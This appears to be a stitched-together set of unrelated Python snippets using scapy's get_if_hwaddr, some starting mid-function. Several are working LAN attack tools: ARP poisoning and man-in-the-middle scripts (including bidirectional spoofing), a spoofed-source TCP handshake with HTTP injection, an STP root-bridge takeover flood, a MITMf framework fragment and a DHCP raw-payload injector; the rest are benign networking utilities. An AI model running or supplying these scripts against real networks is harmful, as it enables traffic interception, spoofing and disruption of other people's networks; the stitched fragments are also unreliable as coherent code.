def main(): """ :return: void """ # handle args parser = argparse.ArgumentParser() parser.add_argument('-src', help="Source IP") parser.add_argument('-dst', help="Destination IP") parser.add_argument('-msg', help="HTTP message") args = parser.parse_args() fake_src_ip = args.src dst_ip = args.dst http_get_msg = "GET / HTTP/1.1\r\n" + args.msg + "\r\n\r\n" # get my mac address my_mac = '00:00:00:00:00:00' my_macs = [get_if_hwaddr(i) for i in get_if_list()] for macs in my_macs: if macs != '00:00:00:00:00:00': my_mac = macs # Arp posion arp_psn = Ether() / ARP(op="who-has", hwsrc=my_mac, pdst=dst_ip, psrc=fake_src_ip) sendp(arp_psn) # Hand Shake ip_layer = IP(src=fake_src_ip, dst=dst_ip) tcp_layer = TCP(dport=PORT, seq=100, flags='S') syn_pkg = ip_layer / tcp_layer syn_ack_pkg = sr1(syn_pkg) if syn_ack_pkg != 0: ip_layer = IP(src=fake_src_ip, dst=dst_ip) tcp_layer = TCP(dport=PORT, seq=syn_ack_pkg[TCP].ack, ack=(syn_ack_pkg[TCP].seq + 1), flags='A') ack_pkg = ip_layer / tcp_layer send(ack_pkg) ack_pkg /= http_get_msg send(ack_pkg)
def run(interface): """ This function launch STP TCN ATTACK :param interface: interface to be launched the attack :type interface: str """ # sniff to found a stp packet pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface) # Look for a STP packet to use a lower priority pk_list={x:y for x,y in pkt.sessions().iteritems() if "Other" in x} item=pk_list.popitem() pkts = item[1] for x in pkts: if STP in x: STP_packet = x break myMAC = get_if_hwaddr(interface) root_id = STP_packet.rootid - 1 bridge_id = STP_packet.bridgeid - 1 p_ether = Dot3(dst="01:80:c2:00:00:00", src=myMAC) p_llc = LLC() p_stp = STP(bpdutype=0x00, bpduflags=0x01, portid=0x8002, rootmac=myMAC, bridgemac=myMAC, rootid=root_id, bridgeid=bridge_id) pkt = p_ether/p_llc/p_stp # STP packet structure try: while 1: sendp(pkt, iface=interface, verbose=0) except KeyboardInterrupt: pass
def restore_update_kernel_neighbors(intf_neigh_map, timeout=DEF_TIME_OUT): # create object for netlink calls to kernel ipclass = IPRoute() mtime = monotonic.time.time start_time = mtime() while (mtime() - start_time) < timeout: for intf, family_neigh_map in intf_neigh_map.items(): # only try to restore to kernel when link is up if is_intf_oper_state_up(intf): src_mac = get_if_hwaddr(intf) intf_idx = ipclass.link_lookup(ifname=intf)[0] # create socket per intf to send packets s = conf.L2socket(iface=intf) # Only two families: 'IPv4' and 'IPv6' for family in ip_family.keys(): # if ip address assigned and if we have neighs in this family, restore them src_ip = first_ip_on_intf(intf, family) if src_ip and (family in family_neigh_map): neigh_list = family_neigh_map[family] for dst_ip, dmac in neigh_list: # use netlink to set neighbor entries set_neigh_in_kernel(ipclass, family, intf_idx, dst_ip, dmac) # sending arp/ns packet to update kernel neigh info s.send(build_arp_ns_pkt(family, src_mac, src_ip, dst_ip)) # delete this family on the intf del intf_neigh_map[intf][family] # close the pkt socket s.close() # if all families are deleted, remove the key if len(intf_neigh_map[intf]) == 0: del intf_neigh_map[intf] # map is empty, all neigh entries are restored if not intf_neigh_map: break time.sleep(CHECK_INTERVAL)
def findSelfPos(self, event): mac = get_if_hwaddr(self.interface) servers = self.client.discover() while(len(servers) < 3): rospy.loginfo("Found only " + str(len(servers)) + " servers!") return otherServers = [x for x in servers if x.find(self.robotName) == -1] # This will call the other servers' WiFiTrilatServices. To do this, we enter our own MAC address, # then take two servers that are NOT ours. responses = self.client.getDistances(mac, otherServers, time.time(), 50) #goodServers = [x.srv_name for x in responses if x.distance != -1] goodResponses = [x for x in responses if x.distance != -1] for x in responses: print x.srv_name print x.distance goodServers = [x.srv_name for x in goodResponses] if len(goodServers) < 2: rospy.loginfo("Not enough servers!") return srvToUse = [] for x in goodServers: srvToUse.append(x) srvToUse.append(self.robotName) srvToUse = sorted(srvToUse) #serverNames = sorted([s[1:s.find('/WiFi')] for s in servers]) index = srvToUse.index(self.robotName) # Next we need to find the distance between the two other servers print "Host 0 is " + goodServers[0] print "Host 1 is " + goodServers[1] goodResponses.append(self.client.getDistances(self.client.IPtoMAC(self.client.hostToIP(goodServers[0])), ["/" + goodServers[1] + "/WiFiTrilat"])[0]) # We translate the indices, so each server will end up building the same triangle. indexTrans = [(0, 2, 1), (0, 1, 2), (2, 1, 0)] myInd = indexTrans[index] # We take our relative position based on alphabetical order. try: [self.x, self.y] = wifiutils.calcFrameOfRef(goodResponses[myInd[0]].distance, goodResponses[myInd[1]].distance, goodResponses[myInd[2]].distance)[index] except ValueError as e: rospy.logwarn(str(e)) return print self.x print self.y if self.discoverOnce: rospy.loginfo("Position resolved; shutting down heartbeat/findpos") self.discoverTimer.shutdown() self.heartbeat.shutdown()
def main(): if os.geteuid() != 0: print "[-] Run me as root" sys.exit(1) usage = 'Usage: %prog [-i interface] [-t target] host' parser = OptionParser(usage) parser.add_option('-i', dest='interface', help='Specify the interface to use') parser.add_option('-t', dest='target', help='Specify a particular host to ARP poison') parser.add_option('-m', dest='mode', default='req', help='Poisoning mode: requests (req) or replies (rep) [default: %default]') parser.add_option('-s', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') (options, args) = parser.parse_args() if len(args) != 1 or options.interface is None: parser.print_help() sys.exit(0) mac = get_if_hwaddr(options.interface) def build_req(): if options.target is None: pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0]) elif options.target: target_mac = getmacbyip(options.target) if target_mac is None: print "[-] Error: Could not resolve targets MAC address" sys.exit(1) pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target) return pkt def build_rep(): if options.target is None: pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2) elif options.target: target_mac = getmacbyip(options.target) if target_mac is None: print "[-] Error: Could not resolve targets MAC address" sys.exit(1) pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target, op=2) return pkt def rearp(signal, frame): sleep(1) print '\n[*] Re-arping network' rearp_mac = getmacbyip(args[0]) pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=args[0], hwsrc=mac, op=2) sendp(pkt, inter=1, count=5, iface=options.interface) sys.exit(0) signal.signal(signal.SIGINT, rearp) if options.mode == 'req': pkt = build_req() elif options.mode == 'rep': pkt = build_rep() if options.summary is True: pkt.show() ans = raw_input('\n[*] Continue? [Y|n]: ').lower() if ans == 'y' or len(ans) == 0: pass else: sys.exit(0) while True: sendp(pkt, inter=2, iface=options.interface)
def get_mac(interface): try: mac_address = get_if_hwaddr(interface) return mac_address except Exception as e: shutdown("Error retrieving MAC address from {}: {}".format(interface, e))
if os.geteuid() != 0: exit("You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.") # Suppress annoying warnings about IPv6 import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Load specific modules from scapy try: from scapy.all import srp,Ether,ARP,conf,get_if_hwaddr except: print "please install scapy (correctly) first" exit(1) # Use valid hwaddr, even if the NIC is not up macaddress=get_if_hwaddr(sys.argv[2]) # Set to False if you would like to only have the "CSV" output to console debug = True # Select output type to console if debug: conf.verb=4 else: conf.verb=0 # Send to Ether.dst broadcast, from our MAC (both Ether.src and ARP.hwsrc), # to ARP.hwdst broadcast from IP ARP.psrc 0.0.0.0 # looking from all IP's in given range ans,unans=srp(Ether(src=macaddress,dst="ff:ff:ff:ff:ff:ff")/ARP(hwsrc=macaddress,hwdst="00:00:00:00:00:00",psrc="0.0.0.0",pdst=sys.argv[1]), timeout=2,iface=str(sys.argv[2]),inter=0.1)
for arg in config_args.split(' '): sys.argv.append(arg) args = parser.parse_args() #################################################################################################### # Here we check for some variables that are very commonly used, and pass them down to the plugins try: args.ip_address = get_if_addr(args.interface) if (args.ip_address == "0.0.0.0") or (args.ip_address is None): sys.exit("[-] Interface %s does not have an assigned IP address" % args.interface) except Exception, e: sys.exit("[-] Error retrieving interface IP address: %s" % e) try: args.mac_address = get_if_hwaddr(args.interface) except Exception, e: sys.exit("[-] Error retrieving interface MAC address: %s" % e) args.configfile = configfile #so we can pass the configobj down to all the plugins #################################################################################################### log_level = logging.__dict__[args.log_level.upper()] #Start logging logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") mitmf_logger = logging.getLogger('mitmf') fileHandler = logging.FileHandler("./logs/mitmf.log")
help='interface to use') parser.add_argument('type', choices=['discover', 'offer', 'request', 'ack'], help='DHCP message type (for Ether and IP layers setup)') parser.add_argument('hexpayload', help='hexadecimal payload') args = parser.parse_args() if args.transactionid: if len(args.hexpayload) < 16: argparse.error("Payload too short to modify transaction id") args.hexpayload = args.hexpayload[:8] + "%.8x" % args.transactionid + args.hexpayload[16:] print("Modified payload with transaction id:\n%s" % args.hexpayload) if args.type == 'discover' or args.type == 'request': pkt = scapy.Ether(src=scapy.get_if_hwaddr(args.iface), dst="ff:ff:ff:ff:ff:ff") \ / scapy.IP(src="0.0.0.0", dst="255.255.255.255") \ / scapy.UDP(sport=68, dport=67) \ / binascii.a2b_hex(args.hexpayload) elif args.type == 'offer' or args.type == 'ack': pkt = scapy.Ether(src=scapy.get_if_hwaddr(args.iface), dst="ff:ff:ff:ff:ff:ff") \ / scapy.IP(src=scapy.get_if_addr(args.iface), dst="255.255.255.255") \ / scapy.UDP(sport=67, dport=68) \ / binascii.a2b_hex(args.hexpayload) print("[+] Sending payload") ans, unans = scapy.srp(pkt, iface=args.iface, timeout=2) print("ans: %s" % ans) print("unans: %s" % unans)
def main(): if os.geteuid() != 0: print "[-] Run me as root" sys.exit(1) usage = 'Usage: %prog [-i interface] [-t target] host' parser = OptionParser(usage) parser.add_option('-i', dest='interface', help='Specify the interface to use') parser.add_option('-t', dest='target', help='Specify a particular host to ARP poison') parser.add_option('-r', action='store_true', dest='reverse', help='Poison both target and host (bidirectional spoofing). Only valid in conjunction with -t.') parser.add_option('-m', dest='mode', default='req', help='Poisoning mode: requests (req) or replies (rep) [default: %default]') parser.add_option('-s', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') (options, args) = parser.parse_args() if len(args) != 1 or options.interface is None: parser.print_help() sys.exit(0) host = args[0] mac = get_if_hwaddr(options.interface) def get_target_mac_by_ip(target): print ("[*] Resolving target's mac address. If this takes more than" " a few seconds, check if the target can be reached on the network.") target_mac = getmacbyip(target) while not target_mac: target_mac = getmacbyip(target) print "[*] Success!" return target_mac def build_req(target, host): if target is None: pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=host, pdst=host) elif options.target: target_mac = get_target_mac_by_ip(target) pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=host, hwdst=target_mac, pdst=target) return pkt def build_rep(target, host): if target is None: pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=host, op=2) elif target: target_mac = get_target_mac_by_ip(target) pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=host, hwdst=target_mac, pdst=target, op=2) return pkt def rearp(signal, frame): sleep(1) print '\n[*] Re-arping network' rearp_mac = getmacbyip(host) pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=host, hwsrc=rearp_mac, op=2) sendp(pkt, inter=1, count=5, iface=options.interface) if options.reverse: r_rearp_mac = getmacbyip(options.target) r_pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=options.target, hwsrc=r_rearp_mac, op=2) sendp(r_pkt, inter=1, count=5, iface=options.interface) sys.exit(0) signal.signal(signal.SIGINT, rearp) if options.mode == 'req': pkt = build_req(options.target, host) elif options.mode == 'rep': pkt = build_rep(options.target, host) if options.reverse: if options.mode == 'req': r_pkt = build_req(host, options.target) elif options.mode == 'rep': r_pkt = build_rep(host, options.target) if options.summary: pkt.show() r_pkt.show() ans = raw_input('\n[*] Continue? [Y|n]: ').lower() if ans == 'y' or len(ans) == 0: pass else: sys.exit(0) while True: sendp(pkt, inter=2, iface=options.interface) if options.reverse: sendp(r_pkt, iface=options.interface)